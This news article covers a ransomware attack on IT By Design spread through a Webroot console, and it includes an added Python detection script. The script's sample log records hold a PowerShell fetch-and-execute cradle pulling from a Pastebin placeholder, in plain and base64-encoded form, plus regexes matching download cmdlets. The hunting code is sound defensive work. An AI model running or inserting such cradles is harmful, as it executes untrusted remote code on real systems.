IT By Design: Network Restored After Ransomware Attack That Impacted 8 Customers
“A short 48 hours later, 96 percent of affected systems are restored, and our clients are operational with minimal to no data loss,” said IT By Design in a statement.
Master MSP IT By Design has restored nearly all its compromised systems after it was hit this week by a ransomware attack that spread to eight of its customers.
The attack against IT By Design (ITBD)—a former MSP that now provides NOC, SOC and staffing services to over 250 MSPs in North America and the U.K.—hit on June 18 and was contained within 48 hours, but not before several clients were impacted.
“What I can say is that we are up and running and everything has been contained,” said Kam Attwal-Kaila, president of Jersey City, N.J.-based ITBD, when reached by phone Thursday afternoon.
[RELATED: The Wipro Breach: Why Managed Service Providers Are At Risk]
In a statement to CRN that provided additional details, ITBD said it was able to stem the attack before it spread to a large number of its MSP customers.
“Fortunately, ITBD’s strong cybersecurity protocols allowed us to detect and quarantine the ransomware with only eight total clients affected,” ITBD said in the statement. “A short 48 hours later, 96 percent of affected systems are restored, and our clients are operational with minimal to no data loss.”
ITBD, which declined to name the clients affected by the attack, said it did not pay any ransom to recover its systems.
A New York area MSP who was pitched services by ITBD, but declined to purchase them, gave the company credit for being forthcoming about the attack. He said the company offered to run his business through the ITBD network.
“You’re handing the keys to your security to somebody else, and you’re being told by a salesman that everything is 100 percent, that’s the danger,” he said, speaking on condition of anonymity. “This is a great case study. If I’m selling to MSPs, I have to be 100 times better at security than those clients. It could put any MSP out of business. Any product that’s sold to us, we expect them to be good at what they do, and we expect them to take security as a high priority. I don’t know how pervasive the breach was. I don’t know how much of their clients' data was affected. We don’t know if eight MSPs exposed 100 of their end-clients' data.”
The ITBD ransomware attack is yet another wakeup call for every MSP to raise its IT security policies, procedures and standards, said a top executive for a security-focused MSP who did not want to be identified.
“This scares me to death,” said the executive. “The immaturity level in the MSP marketplace on security right now is mind-boggling. If a hacker infiltrates your toolsets, all those tools you have installed on all your client’s networks are vulnerable. No one is immune to this. It could happen to anyone at any time. This is bad—really bad. And this is the tip of the iceberg. Imagine how much data exfiltration is happening right now.”
The ransomware virus was deployed through one of ITBD's "third-party providers," said ITBD in the statement.
“Early indications suggest that the virus was deployed in an automated manner through one of our third-party providers. As soon as we discovered the attack, we activated our incident response plan and immediately shut down the entire network.”
Huntress Labs, a security company that provides breach detection services to MSPs, said technology from Webroot was used to spread the ransomware. Baltimore, Md.-based Huntress Labs first made the attack public on a Reddit thread Thursday.
"Thus far, nothing suggests [Webroot was] exploited with a new software vulnerability, and we believe compromised user credentials were likely the source for most/all of the initial access," Huntress Labs said on Reddit. "As a result, we haven't advised any of our partners to stop using these products but have reiterated the importance of [two-factor authentication]."
Huntress said Webroot's management console was used to execute a PowerShell-based payload that downloaded additional malware from Pastebin.
"Please do yourself a favor and enable [two-factor authentication] on your RMM and security products. It's absolutely worth the minor inconvenience," Huntress Labs said on Reddit.
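The chain Huntress describes above (console-launched PowerShell pulling a second stage from a paste site) leaves a recognisable trace in PowerShell script-block logging, and an MSP's SOC can hunt for it independently of any single vendor's console. The following is an added example written for this article, not code from Huntress Labs, Webroot or ITBD; it assumes log records have already been parsed into dictionaries with a `host` and a `script` field (the script-block text, or the command line for encoded invocations), and the paste-site list and sample events are constructed for the demonstration. The PLACEHOLDER paste identifier is a stand-in, not an indicator from the incident.

```python
"""Score PowerShell log records for the console-to-paste-site pattern:
a download cradle fetching from a paste host, optionally wrapped in an
-EncodedCommand argument. Scoring is additive so analysts can tune the
threshold; the sample events below are constructed, not real logs."""
import base64
import re

# Assumption: paste hosts a defender would want to flag; extend for your environment.
PASTE_HOSTS = ("pastebin.com", "paste.ee", "hastebin.com")

# Cmdlets and .NET calls commonly used to pull a second stage over HTTP.
DOWNLOAD_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Start-BitsTransfer)",
    re.IGNORECASE,
)
# Inline execution of fetched text.
EXEC_VERB = re.compile(r"(Invoke-Expression|\biex\b)", re.IGNORECASE)
# -EncodedCommand and its short forms; the payload is base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return (score, reasons) for one record. Encoded payloads are decoded
    first so obfuscated variants score the same as plain ones."""
    text = event["script"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + " " + decoded
    reasons = []
    if any(h in text.lower() for h in PASTE_HOSTS):
        reasons.append("paste-site URL")
    if DOWNLOAD_CRADLE.search(text):
        reasons.append("download cradle")
    if EXEC_VERB.search(text):
        reasons.append("inline execution")
    if decoded:
        reasons.append("encoded command")
    return len(reasons), reasons


def find_suspicious(events, threshold=2):
    """Return (host, score, reasons) for records at or above the threshold."""
    hits = []
    for e in events:
        score, reasons = score_event(e)
        if score >= threshold:
            hits.append((e["host"], score, reasons))
    return hits


# Constructed sample records. The third one wraps a cradle in -enc so the
# paste host never appears in clear text on the command line.
ENCODED_SAMPLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')".encode("utf-16le")
).decode()

SAMPLE_EVENTS = [
    {"host": "ws01", "script": "Get-Service Spooler | Restart-Service"},
    {"host": "ws02", "script": "Invoke-WebRequest -Uri https://pastebin.com/raw/PLACEHOLDER -OutFile $env:TEMP\\u.ps1"},
    {"host": "ws03", "script": "powershell.exe -enc " + ENCODED_SAMPLE},
    {"host": "ws04", "script": "Invoke-WebRequest https://example.com/tools/list.json | ConvertFrom-Json"},
]

if __name__ == "__main__":
    for host, score, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"{host}: score {score}: {', '.join(reasons)}")
```

A plain `Invoke-WebRequest` to an ordinary site (ws04) scores only one point and stays below the default threshold, which keeps routine scripting quiet; the paste-site download (ws02) and the encoded cradle (ws03) cross it. Tuning the host list and threshold is the point of the additive design: the detection is a hunt aid, while the mitigation Huntress stresses, two-factor authentication on the RMM and security consoles, addresses the credential compromise that let the script be launched at all.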
Huntress Labs did not respond to requests for comment from CRN.
In response to questions from CRN, Webroot said that its systems were not compromised by the attack. Webroot discovered the attack, which exploited "customers' weak hygiene practices," said Chad Bacher, senior vice president of products at Webroot, a Carbonite company based in Broomfield, Colo.
As a result, Webroot logged customers out and updated the company’s software to make two-factor authentication mandatory on its systems, he said.
“Webroot was not breached, and our products were not compromised,” Bacher wrote. “Recently, Webroot’s Advanced Malware Removal team discovered that a small number of customers were impacted by a threat actor exploiting a combination of customers’ weak cyber hygiene practices around authentication and RDP (Remote Desktop Protocol). To ensure the best protection for the entire Webroot customer community, we decided it is time to make two-factor authentication mandatory. We did this by conducting a console logout and software update the morning of June 20.”
The breach of ITBD comes as attacks on MSPs and software service providers are on the rise. In fact, the U.S. Department of Homeland Security last October warned that advanced persistent threat actors were on the move against MSPs.
“IT service providers generally have direct and unfettered access to their customers’ networks, and may store customer data on their own internal infrastructure,” DHS's National Cybersecurity and Communications Integration Center wrote. “By servicing a large number of customers, IT service providers can achieve significant economies of scale. However, a compromise in one part of an IT service provider’s network can have globally cascading effects, impacting other customers and introducing significant risk.”
The ITBD attack follows the April breach in which bad actors used ConnectWise Control (formerly ScreenConnect) to infiltrate 100 servers at Wipro and distribute an attack. It also follows a February breach in which an integration between ConnectWise and rival MSP platform Kaseya was exploited by cyber criminals.
“MSPs need to stop sticking their head in the sand and hiding behind a check box,” said the security-focused MSP executive. “You have to be an informed shopper. Know who you are banking your business on.”
Steven Burke contributed to this story.